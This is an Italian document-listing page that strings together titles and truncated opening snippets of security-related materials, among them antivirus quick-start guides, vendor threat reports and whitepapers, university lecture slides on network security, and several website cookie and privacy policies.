Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web 1 Ruberia mobile Android è il sistema operativo per smartphone e tablet più popolare ed è il secondo più preferito dopo Windows dal punto di vista degli autori dei virus. I primi programmi malevoli per

Dettagli

Perché abbiamo problemi di sicurezza? Sicurezza. Reti di calcolatori. 2001-2007 Pier Luca Montessoro (si veda la nota di copyright alla slide n.

Perché abbiamo problemi di sicurezza? Sicurezza. Reti di calcolatori. 2001-2007 Pier Luca Montessoro (si veda la nota di copyright alla slide n. RETI DI CALCOLATORI Prof. PIER LUCA MONTESSORO Facoltà di Ingegneria Università degli Studi di Udine 2001-2007 Pier Luca Montessoro (si veda la nota a pagina 2) 1 Nota di Copyright Questo insieme di trasparenze

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 1/2009 Il bollettino può essere

Dettagli

Documento di sintesi. Report McAfee Labs sulle minacce: terzo trimestre 2013

Documento di sintesi. Report McAfee Labs sulle minacce: terzo trimestre 2013 Documento di sintesi Report McAfee Labs sulle minacce: terzo trimestre Sebbene l'estate possa essere una stagione relativamente calma per l'attività dei criminali informatici (anche i cattivi hanno bisogno

Dettagli

IL POTERE DI DISTRUGGERE: COME FUNZIONA IL MALWARE

IL POTERE DI DISTRUGGERE: COME FUNZIONA IL MALWARE IL POTERE DI DISTRUGGERE: COME FUNZIONA IL MALWARE SOMMARIO In breve 3 Attacchi Web in aumento 4 Meglio prevenire che curare 5 Restare nascosti è un arma dei malintenzionati 6 I visitatori dei siti Web:

Dettagli

Botnet: Il lato oscuro del cloud computing

Botnet: Il lato oscuro del cloud computing Botnet: Il lato oscuro del cloud computing De Angelo Comazzetto, Senior Product Manager Le botnet costituiscono una seria minaccia per le vostre reti, per le aziende, per i vostri partner e anche per i

Dettagli

Blocca gli attacchi mirati avanzati, identifica gli utenti ad alto rischio e controlla le minacce interne

Blocca gli attacchi mirati avanzati, identifica gli utenti ad alto rischio e controlla le minacce interne TRITON AP-EMAIL Blocca gli attacchi mirati avanzati, identifica gli utenti ad alto rischio e controlla le minacce interne Da adescamenti basati sull ingegneria sociale al phishing mirato, gli attacchi

Dettagli

Delta-Homes direttamente è collegato con altri browser hijacker

Delta-Homes direttamente è collegato con altri browser hijacker Delta-Homes è classificato come un browser hijacker. Questo significa che cambia la home page e il motore di ricerca di delta-homes.com. Il sito stesso può non nuocere, ma se si utilizza il motore di ricerca

Dettagli

l'incubo costante e mutevole del cybercrime.

l'incubo costante e mutevole del cybercrime. CONOSCERE LE MINACCE PER LE PMI Cyberwar, hacktivism e attacchi DDoS fanno sempre notizia. Tuttavia, si tratta di fenomeni limitati esclusivamente a multinazionali ed enti governativi? Esa Tornikoski di

Dettagli

ESET SMART SECURITY 8

ESET SMART SECURITY 8 ESET SMART SECURITY 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

Protezione completa, in tempo reale, contro le minacce avanzate e il furto di dati

Protezione completa, in tempo reale, contro le minacce avanzate e il furto di dati TRITON AP-WEB Protezione completa, in tempo reale, contro le minacce avanzate e il furto di dati Il tuo business e i tuoi dati sono costantemente sotto attacco. Le soluzioni di sicurezza tradizionali non

Dettagli

Ottimizzazione della gestione della sicurezza con McAfee epolicy Orchestrator

Ottimizzazione della gestione della sicurezza con McAfee epolicy Orchestrator Documentazione Ottimizzazione della gestione della sicurezza con Efficacia comprovata dalle ricerche I Chief Information Officer (CIO) delle aziende di tutto il mondo devono affrontare una sfida molto

Dettagli

Le tecnicheinformaticheper la sottrazionedidatiriservati

Le tecnicheinformaticheper la sottrazionedidatiriservati Le tecnicheinformaticheper la sottrazionedidatiriservati Cosimo Anglano Dipartimento di Informatica & Centro Studi Interdipartimentale sulla Criminalitá Informatica Universitá del Piemonte Orientale Alessandria

Dettagli

La prima linea della tracciabilità e difesa nella guerra contro la contraffazione è arrivata

La prima linea della tracciabilità e difesa nella guerra contro la contraffazione è arrivata La prima linea della tracciabilità e difesa nella guerra contro la contraffazione è arrivata Con le operazioni criminali che diventano sempre più sofisticate, un numero preoccupante di consumatori diventa

Dettagli

Il selvaggio mondo del malware: come proteggere la vostra azienda dall'interno

Il selvaggio mondo del malware: come proteggere la vostra azienda dall'interno Il selvaggio mondo del malware: come proteggere la vostra azienda dall'interno Le minacce sono in continua evoluzione, ma la vostra protezione firewall potrebbe non essere più all'altezza. È giunta l'ora

Dettagli

Le reti Sicurezza in rete

Le reti Sicurezza in rete Le reti Sicurezza in rete Tipi di reti Con il termine rete si intende un insieme di componenti, sistemi o entità interconnessi tra loro. Nell ambito dell informatica, una rete è un complesso sistema di

Dettagli

ESET SMART SECURITY 9

ESET SMART SECURITY 9 ESET SMART SECURITY 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Smart Security è un software di

Dettagli

ANALISI DÌ MALWARE E SOLUZIONI DÌ DIFESA. Tesina di Matteo Neri A.S. 2008-2009

ANALISI DÌ MALWARE E SOLUZIONI DÌ DIFESA. Tesina di Matteo Neri A.S. 2008-2009 ANALISI DÌ MALWARE E SOLUZIONI DÌ DIFESA Tesina di Matteo Neri A.S. 2008-2009 Sommario - Introduzione - Analisi di malware - Soluzioni di difesa - Previsioni sul futuro del malware Prima Parte Introduzione

Dettagli

COOKIES POLICY. 2. Tipologie di Cookies utilizzati da parte del sito www.elleservizi.it e/o delle aziende e dei marchi che ne fanno parte

COOKIES POLICY. 2. Tipologie di Cookies utilizzati da parte del sito www.elleservizi.it e/o delle aziende e dei marchi che ne fanno parte COOKIES POLICY Questa cookies policy contiene le seguenti informazioni : 1. Cosa sono i Cookies. 2. Tipologie di Cookies. 3. Cookies di terze parti. 4. Privacy e Sicurezza sui Cookies. 5. Altre minacce

Dettagli

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido

ESET NOD32 Antivirus 4 per Linux Desktop. Guida all'avvio rapido ESET NOD32 Antivirus 4 per Linux Desktop Guida all'avvio rapido ESET NOD32 Antivirus 4 fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense

Dettagli

Microsoft Security Intelligence Report

Microsoft Security Intelligence Report Microsoft Security Intelligence Report Volume 13 GENNAIO - GIUGNO 2012 RISULTATI www.microsoft.com/sir Microsoft Security Intelligence Report Il presente documento è fornito esclusivamente a scopo informativo.

Dettagli

Minacce Informatiche. Paolo

Minacce Informatiche. Paolo Minacce Informatiche Paolo Programma Virus, Trojan, spayware, malware ecc... Informazioni generali su Internet Ricerche, siti web, email, chatline, p2p, YouTube, Telefonini, InstantMessaging Che cos è

Dettagli

Modalità e luogo del trattamento dei Dati raccolti

Modalità e luogo del trattamento dei Dati raccolti Privacy Policy di www.studioilgranello.it Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti. Titolare del Trattamento dei Dati STUDIO IL GRANELLO s.c.s. - Via S.Prospero, 24-42015 Correggio

Dettagli

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia Claudio De Paoli IT Security Practice Manager Un approccio innovativo alla sicurezza degli accessi ai servizi di ebanking Roma, gennaio 2011 Cybercrime: Costante aumento di Incidenti e frodi Il mercato

Dettagli

Cookie Policy. Questo documento contiene le seguenti informazioni:

Cookie Policy. Questo documento contiene le seguenti informazioni: Cookie Policy Il sito web di ASSOFERMET, con sede a Milano (Mi), in VIA GIOTTO 36 20145, Titolare, ex art. 28 d.lgs. 196/03, del trattamento dei Suoi dati personali La rimanda alla presente Policy sui

Dettagli

L ELDORADO. di ottenere fama e prestigio, oggi chi scrive virus informatici ha un solo scopo: guadagnare denaro.

L ELDORADO. di ottenere fama e prestigio, oggi chi scrive virus informatici ha un solo scopo: guadagnare denaro. SICUREZZA L ELDORADO dei pirati Una ricerca di Panda Security conferma il momento nero dei software antivirus. Ecco perché non siamo più al sicuro U n computer su quattro, anche se è protetto da un programma

Dettagli

Tipologie e metodi di attacco

Tipologie e metodi di attacco Tipologie e metodi di attacco Tipologie di attacco Acquisizione di informazioni L obiettivo è quello di acquisire informazioni, attraverso l intercettazione di comunicazioni riservate o ottenendole in

Dettagli

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa

M ODULO 7 - SYLLABUS 1.0. IT Security. Corso NUOVA ECDL 2015 prof. A. Costa M ODULO 7 - SYLLABUS 1.0 IT Security Corso NUOVA ECDL 2015 prof. A. Costa Minacce ai dati 1 Concetti di sicurezza Differenze fra dati e informazioni Il termine crimine informatico: intercettazione, interferenza,

Dettagli

www.intego.com PL/ATTIVA/IT/1009

www.intego.com PL/ATTIVA/IT/1009 www.intego.com PL/ATTIVA/IT/1009 Esistono virus per Mac OS X? Esistono virus che colpiscono Mac OS X? Poiché di recente la stampa informatica ha discusso molto riguardo a virus e computer Mac, abbiamo

Dettagli

Proteggi gli account personali

Proteggi gli account personali con la collaborazione di Proteggi gli account personali Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Proteggi gli

Dettagli

KASPERSKY SECURITY FOR BUSINESS

KASPERSKY SECURITY FOR BUSINESS SECURITY FOR BUSINESS Le nostre tecnologie perfettamente interoperabili Core Select Advanced Total Gestita tramite Security Center Disponibile in una soluzione mirata Firewall Controllo Controllo Dispositivi

Dettagli

Privacy Policy di FORMAZIONE MANTOVA FOR.MA Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti.

Privacy Policy di FORMAZIONE MANTOVA FOR.MA Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti. Privacy Policy di FORMAZIONE MANTOVA FOR.MA Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti. Titolare del Trattamento dei Dati FORMAZIONE MANTOVA FOR.MA Azienda Speciale della Provincia

Dettagli

Requisiti di controllo dei fornitori esterni

Requisiti di controllo dei fornitori esterni Requisiti di controllo dei fornitori esterni Sicurezza cibernetica Per fornitori classificati a Basso Rischio Cibernetico Requisito di cibernetica 1 Protezione delle attività e configurazione del sistema

Dettagli

Sistemi di rilevamento malware: non tutti sono uguali

Sistemi di rilevamento malware: non tutti sono uguali Sistemi di rilevamento malware: non tutti sono uguali Internet è diventata il principale veicolo di infezione dei PC tramite la diffusione di malware. Ogni giorno, infatti, Sophos rileva una nuova pagina

Dettagli

Sicurezza delle e-mail: guida all acquisto

Sicurezza delle e-mail: guida all acquisto Sicurezza delle e-mail: guida all acquisto Introduzione Vista la crescente quantità di dati sensibili per l azienda e di informazioni personali che consentono l identificazione (PII), inviata tramite e-mail,

Dettagli

per Mac Guida all'avvio rapido

per Mac Guida all'avvio rapido per Mac Guida all'avvio rapido ESET Cybersecurity fornisce una protezione all'avanguardia per il computer contro codici dannosi. Basato sul motore di scansione ThreatSense introdotto per la prima volta

Dettagli

Privacy, dati e denaro al sicuro con i nuovi

Privacy, dati e denaro al sicuro con i nuovi Privacy, dati e denaro al sicuro con i nuovi prodotti Kaspersky Lab Milano, 3 settembre 2014 Kaspersky Lab lancia la nuova linea prodotti per utenti privati: Kaspersky Anti-Virus 2015, Kaspersky Internet

Dettagli

Symantec Mobile Security

Symantec Mobile Security Protezione avanzata dalle minacce per i dispositivi mobili Data-sheet: Gestione degli endpoint e mobiltà Panoramica La combinazione di app store improvvisati, la piattaforma aperta e la consistente quota

Dettagli

Sicurezza informatica

Sicurezza informatica Sicurezza informatica Per sicurezza informatica si intende quella branca dell informatica dedicata alla salvaguardia dei sistemi informatici (reti, mainframe, postazioni di lavoro,...) da possibili violazioni

Dettagli

Una sicurezza completa e pervasiva contro le minacce Web

Una sicurezza completa e pervasiva contro le minacce Web White paper Una sicurezza completa e pervasiva contro le minacce Web Cisco Web Security garantisce una migliore protezione dei dati e del marchio per le aziende di oggi Panoramica Spaziando dalla collaborazione

Dettagli

www.avg.it Come navigare senza rischi

www.avg.it Come navigare senza rischi Come navigare senza rischi 01 02 03 04 05 06.Introduzione 01.Naviga in Sicurezza 02.Social Network 08.Cosa fare in caso di...? 22.Supporto AVG 25.Link e riferimenti 26 [02] 1.introduzione l obiettivo di

Dettagli

Previsioni sulle minacce per il 2011

Previsioni sulle minacce per il 2011 Rapporto Previsioni sulle minacce per il 2011 Di McAfee Labs Il panorama delle minacce si è evoluto in modo considerevole nello scorso anno. McAfee Labs ha osservato aumenti netti nella complessità e nella

Dettagli

Proteggi ciò che crei. Guida all avvio rapido

Proteggi ciò che crei. Guida all avvio rapido Proteggi ciò che crei Guida all avvio rapido 1 Documento aggiornato il 10.06.2013 Tramite Dr.Web CureNet! si possono eseguire scansioni antivirali centralizzate di una rete locale senza installare il programma

Dettagli

ESET SMART SECURITY 7

ESET SMART SECURITY 7 ESET SMART SECURITY 7 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET

Dettagli

Sophos. Premessa. Con l evoluzione delle minacce, il controllo è fondamentale. Un offerta completa e sicura. Un servizio esclusivo

Sophos. Premessa. Con l evoluzione delle minacce, il controllo è fondamentale. Un offerta completa e sicura. Un servizio esclusivo Sophos Premessa Con l evoluzione delle minacce, il controllo è fondamentale Un offerta completa e sicura Un servizio esclusivo 43 Premessa Sophos è una società leader a livello mondiale nella sicurezza

Dettagli

COOKIES PRIVACY POLICY DI BANCA PROFILO

COOKIES PRIVACY POLICY DI BANCA PROFILO COOKIES PRIVACY POLICY DI BANCA PROFILO Indice e sommario del documento Premessa... 3 1. Cosa sono i Cookies... 4 2. Tipologie di Cookies... 4 3. Cookies di terze parti... 5 4. Privacy e Sicurezza sui

Dettagli

ESET SMART SECURITY 6

ESET SMART SECURITY 6 ESET SMART SECURITY 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Guida di avvio rapido Fare clic qui per scaricare la versione più recente di questo documento ESET Smart Security offre una protezione

Dettagli

Ogni browser (Internet Explorer, Google Chrome, Mozilla Firefox o Safari) permette di impostare le preferenze per i cookie.

Ogni browser (Internet Explorer, Google Chrome, Mozilla Firefox o Safari) permette di impostare le preferenze per i cookie. COSA SONO? Un cookie è rappresentato da un file di testo memorizzato sul vostro computer, tramite il browser di navigazione, creato durante la navigazione sui siti web. Servono nella maggioranza dei casi

Dettagli

Sicurezza online per voi e la vostra famiglia

Sicurezza online per voi e la vostra famiglia Sicurezza online per voi e la vostra famiglia Guida elettronica alla vita digitale TrendLabs Di Paul Oliveria, responsabile specializzato in sicurezza di TrendLabs Siamo tutti online, ma non siamo tutti

Dettagli

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero

e quindi di navigare in rete. line può essere limitato a due persone o coinvolgere un ampio numero Glossario Account (profilo o identità) insieme dei dati personali e dei contenuti caricati su un sito Internet o su un social network. Anti-spyware programma realizzato per prevenire e rilevare i programmi

Dettagli

FINAL 1.3 DOCUMENTO PUBBLICO. Acceptable Use Policy (AUP)

FINAL 1.3 DOCUMENTO PUBBLICO. Acceptable Use Policy (AUP) FINAL 1.3 DOCUMENTO PUBBLICO Acceptable Use Policy (AUP) Milano, 13/06/2007 Introduzione All interno del presente documento sono descritte alcune norme comportamentali che gli utenti connessi ad Internet

Dettagli

La sicurezza nel commercio elettronico

La sicurezza nel commercio elettronico La sicurezza nel commercio elettronico Dr. Stefano Burigat Dipartimento di Matematica e Informatica Università di Udine www.dimi.uniud.it/burigat stefano.burigat@uniud.it Sicurezza digitale Budget per

Dettagli

Sicurezza. informatica. Peschiera Digitale 2102-2013 Sicurezza

Sicurezza. informatica. Peschiera Digitale 2102-2013 Sicurezza Sicurezza informatica Peschiera Digitale 2102-2013 Sicurezza Overview 1. Nozioni generali 2. Virus e anti-virus 3. Spam e anti-spam 4. Phishing 5. Social engineering 6. Consigli Peschiera Digitale 2102-2013

Dettagli

Guida dell'utente. Guida dell'utente Intego ChatBarrier X3 Pagina 1

Guida dell'utente. Guida dell'utente Intego ChatBarrier X3 Pagina 1 Guida dell'utente Guida dell'utente Intego ChatBarrier X3 Pagina 1 Intego ChatBarrier X3 per Macintosh 2004 Intego, Inc. Tutti i diritti riservati Intego, Inc. 500 N Capital of Texas Hwy, Ste 8-150 Austin,

Dettagli

SICUREZZA INFORMATICA SICUREZZA DEI DISPOSITIVI MOBILI

SICUREZZA INFORMATICA SICUREZZA DEI DISPOSITIVI MOBILI SICUREZZA INFORMATICA SICUREZZA DEI DISPOSITIVI MOBILI Consigli per la protezione dei dati personali Ver.1.0, 21 aprile 2015 2 Pagina lasciata intenzionalmente bianca I rischi per la sicurezza e la privacy

Dettagli

Come ottenere il massimo da un firewall di nuova generazione

Come ottenere il massimo da un firewall di nuova generazione White paper Come ottenere il massimo da un firewall di nuova generazione La piena visibilità e il controllo completo della rete migliorano l'efficienza aziendale e consentono di accrescere le attività

Dettagli

ANNIE WRITE SCHOOLS MSC CROCIERE

ANNIE WRITE SCHOOLS MSC CROCIERE CASE STUDY ANNIE MSC WRITE CROCIERE SCHOOLS Hogwarts La compagnia Works Magic naviga with in the Next-Generation Firewall PA-500 (24) MSC Crociere naviga per tutto l anno nel Mar Mediterraneo e offre tantissime

Dettagli

Potete gestire centralmente tutti i dispositivi mobili aziendali?

Potete gestire centralmente tutti i dispositivi mobili aziendali? Potete gestire centralmente tutti i dispositivi mobili aziendali? Gestite tutti i vostri smartphone, tablet e computer portatili da una singola console con Panda Cloud Systems Management La sfida: l odierna

Dettagli

PRIVACY POLICY. BlackRock si impegna a:

PRIVACY POLICY. BlackRock si impegna a: PRIVACY POLICY BlackRock riconosce l importanza di proteggere le Vostre informazioni personali e di natura finanziaria nel momento in cui visitate i nostri siti internet (di seguito, il Sito o i Siti ).

Dettagli

COOKIES PRIVACY POLICY. Il sito web di. Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova

COOKIES PRIVACY POLICY. Il sito web di. Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova COOKIES PRIVACY POLICY Il sito web di Onoranze funebri Castiglioni di Castiglioni A. Via Valle 11 46040 Cavriana Mantova Titolare, ex art. 28 d.lgs. 196/03, del trattamento dei Suoi dati personali La rimanda

Dettagli

Blocca la perdita e il furto di dati, mantieni conformità e salvaguardia il marchio, la reputazione aziendale e la proprietà intellettuale.

Blocca la perdita e il furto di dati, mantieni conformità e salvaguardia il marchio, la reputazione aziendale e la proprietà intellettuale. TRITON AP-DATA Blocca la perdita e il furto di dati, mantieni conformità e salvaguardia il marchio, la reputazione aziendale e la proprietà intellettuale. Da una reputazione compromessa a multe e sanzioni

Dettagli

Aggiunte alla documentazione

Aggiunte alla documentazione Aggiunte alla documentazione Software di sicurezza Zone Alarm versione 7.1 Nel presente documento vengono trattate le nuove funzionalità non incluse nelle versioni localizzate del manuale utente. Fare

Dettagli

WEBSENSE. La sicurezza unificata Triton. ICT Security 2013

WEBSENSE. La sicurezza unificata Triton. ICT Security 2013 ICT Security 2013 WEBSENSE La popolarità degli strumenti di collaborazione basati su Web, gli applicativi Internet sempre più complessi, i social network e la presenza di applicazioni software-as-a-service

Dettagli

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio Modulo 1 Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio La sicurezza dei sistemi informatici Tutti i dispositivi di un p.c.

Dettagli

MarketingDept. mar-13

MarketingDept. mar-13 mar-13 L Azienda Fondata nel 1988 Sede principale a Helsinki, Finlandia; uffici commerciali in oltre 100 paesi Attiva su tutti i segmenti di mercato, da Consumer a Corporate, specializzata nell erogazione

Dettagli

Panoramica del firewall di nuova generazione Palo Alto Networks

Panoramica del firewall di nuova generazione Palo Alto Networks PALO PALO ALTO ALTO NETWORKS: NETWORKS: panoramica Next-Generation del firewall Firewall di nuova Feature generazione Overview Panoramica del firewall di nuova generazione Palo Alto Networks Importanti

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

ISTR XV: FOCUS SULLA SITUAZIONE ITALIANA E NUOVI TREND

ISTR XV: FOCUS SULLA SITUAZIONE ITALIANA E NUOVI TREND PER ULTERIORI INFORMAZIONI CONTATTARE: Emanuela Lombardo Gaia Fasciani Roberta Aliberti Viotti Symantec Italia Competence 02/241151 02/76281027 emanuela_lombardo@symantec.com aliberti@competencecommunication.com

Dettagli

Microsoft Security Intelligence Report

Microsoft Security Intelligence Report Microsoft Security Intelligence Report Da gennaio a giugno 2007 Riepilogo dei principali risultati Microsoft Security Intelligence Report (gennaio - giugno 2007) Riepilogo dei principali risultati Il Microsoft

Dettagli

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Sommario F-Secure Anti-Virus for Mac 2015 Sommario Capitolo 1: Operazioni preliminari...3 1.1 Gestione abbonamento...4 1.2 Come verificare che il computer sia protetto...4

Dettagli

Avviso per la privacy di Johnson Controls

Avviso per la privacy di Johnson Controls Avviso per la privacy di Johnson Controls Johnson Controls, Inc. e le relative società affiliate (collettivamente, Johnson Controls, noi, ci o nostro) garantiscono la tutela della privacy e si impegnano

Dettagli

Intranet VPN. Intranet VPN. Soluzioni Tecnologiche per le aziende. Seminario on line

Intranet VPN. Intranet VPN. Soluzioni Tecnologiche per le aziende. Seminario on line Intranet VPN Intranet VPN Soluzioni Tecnologiche per le aziende Seminario on line 1 Seminario on line Intranet VPN Seminario sulle Soluzioni Tecnologiche per le aziende 3. Benvenuto 4. Obiettivi 5. Introduzione

Dettagli

Xerox SMart esolutions. White Paper sulla protezione

Xerox SMart esolutions. White Paper sulla protezione Xerox SMart esolutions White Paper sulla protezione White Paper su Xerox SMart esolutions La protezione della rete e dei dati è una delle tante sfide che le aziende devono affrontare ogni giorno. Tenendo

Dettagli

In questa pagina si descrivono le modalità di gestione del sito in riferimento al trattamento dei dati personali degli utenti che lo consultano.

In questa pagina si descrivono le modalità di gestione del sito in riferimento al trattamento dei dati personali degli utenti che lo consultano. Privacy Policy In questa pagina si descrivono le modalità di gestione del sito in riferimento al trattamento dei dati personali degli utenti che lo consultano. Si tratta di un'informativa che è resa anche

Dettagli

Piccolo vocabolario del Modulo 7

Piccolo vocabolario del Modulo 7 Piccolo vocabolario del Modulo 7 Cosa è Internet? Internet è una grossa rete di calcolatori, ossia un insieme di cavi e altri dispositivi che collegano tra loro un numero enorme di elaboratori di vario

Dettagli

Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative

Obiettivo: realizzazione di reti sicure TIPI DI ATTACCO. Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Obiettivo: realizzazione di reti sicure Politica di sicurezza: a) scelte tecnologiche b) strategie organizzative Per quanto riguarda le scelte tecnologiche vi sono due categorie di tecniche: a) modifica

Dettagli

SICUREZZA INFORMATICA CLOUD COMPUTING

SICUREZZA INFORMATICA CLOUD COMPUTING SICUREZZA INFORMATICA CLOUD COMPUTING Uso consapevole del Cloud Ver.1.0, 10 luglio 2015 2 Pagina lasciata intenzionalmente bianca 1. IL CLOUD COMPUTING Il continuo aumento delle richieste di servizi informatici,

Dettagli

Symantec Protection Suite Enterprise Edition per Gateway Domande frequenti

Symantec Protection Suite Enterprise Edition per Gateway Domande frequenti Domande frequenti 1. Che cos'è? fa parte della famiglia Enterprise delle Symantec Protection Suite. Protection Suite per Gateway salvaguarda i dati riservati e la produttività dei dipendenti creando un

Dettagli

Media mensile 96 3 al giorno

Media mensile 96 3 al giorno Il numero di attacchi gravi di pubblico dominio che sono stati analizzati è cresciuto nel 2013 del 245%. Media mensile 96 3 al giorno Fonte Rapporto 2014 sulla Sicurezza ICT in Italia. IDENTIKIT Prima

Dettagli

Defenx Antivirus 2010 La difesa impenetrabile contro tutte le minaccia informatiche

Defenx Antivirus 2010 La difesa impenetrabile contro tutte le minaccia informatiche Defenx Antivirus 2010 La difesa impenetrabile contro tutte le minaccia informatiche I computer sono incredibilmente veloci, accurati e stupidi. Gli uomini sono incredibilmente lenti, inaccurati e intelligenti.

Dettagli